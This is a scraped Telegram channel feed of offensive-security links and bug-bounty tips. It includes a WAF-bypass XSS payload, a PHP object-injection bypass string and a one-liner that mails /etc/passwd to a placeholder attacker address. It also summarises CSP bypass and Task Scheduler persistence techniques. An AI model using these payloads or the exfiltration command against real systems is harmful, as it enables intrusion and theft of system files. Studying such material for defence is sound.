Information Security
@sec_nerd_en
408
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
408 subscribers
Information Security
https://medium.com/@mehulcodes/hello-hackers-17572db4476a
Medium
Response to
Hello Hackers,
Information Security
https://www.sec-1.com/blog/wp-content/uploads/2016/08/Hunting-postMessage-Vulnerabilities.pdf
Claranet UK
Sec-1 now fully incorporated into Claranet. How to find us.
Information Security
https://www.sec-1.com/blog/2016/hunting-html-5-postmessage-vulnerabilities
Sec-1 Labs
Hunting HTML 5 postMessage Vulnerabilities - Sec-1 Labs
Download Paper: Hunting postMessage Vulnerabilities Download Sample Code: sample code Sec-1 Ltd partnered with AppCheck.com to undertake a research project investigating the security challenges posed by next generation web applications. The project included…
Information Security
http://www.thegreycorner.com/2017/01/exploiting-difficult-sql-injection.html
Information Security
https://brutelogic.com.br/xss.php?a=%3Csvg%20onload=top.open%60javas%5Ccript:al%5Cert(1)%60%3E
Information Security
https://medium.com/@ronak_9889/privilege-escalation-using-api-endpoint-fce841caaff3
Medium
Privilege Escalation using Api endpoint
Hi All,
Information Security
Cloudflare XSS Bypass Payload
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare
#bugbounty
#bugbountytips
#WAF
#Xss
Information Security
https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441
Medium
CORS To CSRF Attack
This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The…
Information Security
https://0day.work/open-redirects-in-improperly-configured-mod_rewrite-rules-poc-for-cve-2019-10098/
Sebastian Neef - 0day.work
Open Redirects In Improperly Configured mod_rewrite Rules (PoC for CVE-2019-10098?)
I recently came across the following Apache vulnerability
[https://httpd.apache.org/security/vulnerabilities_24.html]: "mod_rewrite
potential open redirect (CVE-2019-10098)", but I couldn't find a proof of
concept, so I started playing around with possible…
Information Security
https://twitter.com/nixfreax/status/1189196160386371584
Twitter
nixfreax
pseudo shell via email: echo "message body: $(cat /etc/passwd)" | mail -s "loot" attacker@example.com #BugBounty https://t.co/CUDFAgX2EV
Information Security
https://blog.ripstech.com/2019/driveby-rce-exploit-pimcore/
RIPS Security Blog
Drive By RCE Exploit in Pimcore 6.2.0
Read More ›
Information Security
https://pentestmag.com/local-privilege-escalation-in-rapid7s-windows-insight-idr-agent/
Pentestmag
Local Privilege Escalation in Rapid7’s Windows Insight IDR Agent - Pentestmag
Local Privilege Escalation in Rapid7’s Windows Insight IDR Agent by Florian Bogner With Insight IDR Rapid7 has created a very powerful, yet …
Information Security
https://pentesttools.net/xsrfprobe-the-prime-cross-site-request-forgery-audit-and-exploitation-toolkit/
Information Security
https://awesomeaakash.github.io/2019/10/29/Bug-Bounty-Writeups-Summary-2/
awesomeaakash.github.io
Bug-Bounty-Writeups-Summary-2
Hello friends, Here is Part 2 of Bug Hunting Writeup Summary ->
Information Security
https://www.youtube.com/watch?v=kcnJMKXnW1k
YouTube
PayPal Inc Bug Bounty - Arbitriary File Upload Vulnerability & Remote Code Execution Vulnerability
Title: PayPal Inc Bug Bounty - Arbitriary File Upload Vulnerability & Remote Code Execution
URL: https://www.vulnerability-lab.com/get_content.php?id=2180
Information Security
https://medium.com/@danangtriatmaja/bug-bounty-self-xss-clickjacking-good-xss-tokopedia-8df7a65e0955
Medium
[ BUG BOUNTY ] Self XSS + ClickJacking = Good XSS | Tokopedia
Hi sobat, bagaimana kabarnya ? semoga senantiasa sehat selalu dan diberikan kelancaran dalam aktifitasnya. ^-^
Information Security
https://twitter.com/CurtBraz/status/1180372698167435265
Twitter
𝐂𝐮𝐫𝐭𝐢𝐬 𝐁𝐫𝐚𝐳𝐳𝐞𝐥𝐥
Found HTML Injection in a web form but the CSP was blocking execution. I noticed *.google.com was allowed which is common for Google Analytics. Hosted an xss.js payload on Google Drive and found the raw download link. Passed that in to the script src location…
Information Security
https://github.com/devploit/XORpass
GitHub
GitHub - devploit/XORpass: Encoder to bypass WAF filters using XOR operations.
Encoder to bypass WAF filters using XOR operations. - devploit/XORpass
Information Security
https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html
www.a12d404.net
Persistence using Task Scheduler without a Scheduled Task
Task Scheduler service loads a non-existing DLL enabling persistence as `NT AUTHORITY\SYSTEM`.
Information Security
https://twitter.com/brutelogic/status/1189555088282587138
Twitter
Brute Logic
POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip